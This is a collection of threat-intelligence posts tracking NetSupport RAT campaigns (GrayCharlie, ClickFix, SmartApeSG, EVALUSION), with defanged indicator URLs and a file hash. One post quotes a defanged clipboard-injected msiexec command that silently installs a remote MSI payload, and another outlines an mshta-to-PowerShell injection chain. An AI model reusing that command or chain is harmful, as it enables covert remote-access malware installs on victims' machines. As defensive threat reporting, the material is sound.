GrayCharlie Hijacks WordPress to Deploy NetSupport RAT

GrayCharlie is a threat actor compromising WordPress sites to deliver
NetSupport RAT.

Pulse ID: 699e1a3549ab2f017a665928
Pulse Link: https://otx.alienvault.com/pulse/699e1a3549ab2f017a665928
Pulse Author: cryptocti
Created: 2026-02-24 21:37:57

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CyberSecurity #InfoSec #NetSupport #NetSupportRAT #OTX #OpenThreatExchange #RAT #RDP #Word #Wordpress #bot #cryptocti

2025-12-29 (Monday): #ClickFix page leads to #NetSupportRAT infection.

Details at www.malware-traffic-analysis.net/2025/12/29/index.html

Of note, this is not from the usual ClickFix campaigns that I track. While #SmartApeSG has often pushed #NetSupport #RAT, this is a completely different vector for the initial URL.

The initial sites.google[.]com URLs for this campaign are sent via email. But I don't have an example for this particular infection chain.

New JS#SMUGGLER malware campaign delivers #NetSupportRAT through compromised websites – hackers get full remote control of Windows machines.

Read: https://hackread.com/jssmuggler-netsupport-rat-infected-sites/

#JSsmuggler #Malware #Cybersecurity #Windows

Researchers are tracking a new ClickFix campaign called EVALUSION, delivering Amatera Stealer and NetSupport RAT.

The chain begins with Run-dialog execution during fake CAPTCHA checks, followed by mshta.exe → PowerShell → PureCrypter → DLL injection into MSBuild.exe.

Amatera includes advanced evasion and broad data-harvesting features. NetSupport RAT is deployed only when valuable data is detected.
Related phishing activity involves XWorm, Cephas kits, SmartApeSG, and Tycoon 2FA.

Thoughts on this growing reliance on execution through supposedly “trusted” system tools?

💬 Share your perspective
👍 Follow us for more clear, unbiased threat reporting

#Infosec #CyberSecurity #ClickFix #AmateraStealer #NetSupportRAT #MalwareAnalysis #ThreatIntel #MaaS #PhishingKits #SecurityResearch

Neue EVALUSION‑ClickFix‑Kampagne:
Amatera‑Stealer und NetSupport‑RAT werden verbreitet

Cyber‑Security‑Forscher von eSentire haben eine EVALUSION genannte Malware‑Kampagne entdeckt, die das mittlerweile weit verbreitete ClickFix‑Social‑Engineering‑Muster nutzt, um den Amatera Stealer und das NetSupport RAT zu installieren.

Mehr: https://maniabel.work/archiv/265

#ClickFix #AmateraStealer #NetSupportRAT, infosec #infosecnews #BeDiS

2025-09-22 (Monday): #SmartApeSG using #FileFix style #ClickFix technique on its fake CAPTCHA page.

While #KongTuke has reportedly used FileFix, this is the first time I've seen it from SmartApeSG sites.

#clipboardhijacking Script injected into clipboard:

msiexec /i hxxps[:]//founderevo[.]com/res/velvet ISLANDABSTRACT=surgewarfare.bat /qn

The downloaded file is an MSI for #NetSupportRAT

https://www.virustotal.com/gui/file/958586ab1865a61a4da6280cc9b3c69005611bf19df1e74b7c025f3c3aae3f7a

2025-08-22 (Friday): #SmartApeSG for #NetSupport #RAT (#NetSupportRAT)

Some sites have injected script that leads directly to the fake CAPTCHA page for #ClickFix instructions.

Other sites have injected script that redirects to the URL for the fake CAPTCHA page.

Direct example (compromised site --> script for CAPTCHA page):

- hxxps[:]//mexicobusiness[.]news/
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Recirect example (compromised site --> Redirect URL --> script for CAPTCHA page):

- hxxps[:]//myvocabulary[.]com/
- hxxps[:]//myevmanual[.]com/d.js <-- 302 found for next URL
- hxxps[:]//clouwave[.]net/ajax/pixi.min.js

Either way, you get the same CAPTCHA page.

IOCs at https://github.com/malware-traffic/indicators/blob/main/2025-08-22-IOCs-for-SmartApeSG-activity.txt

cc: @monitorsg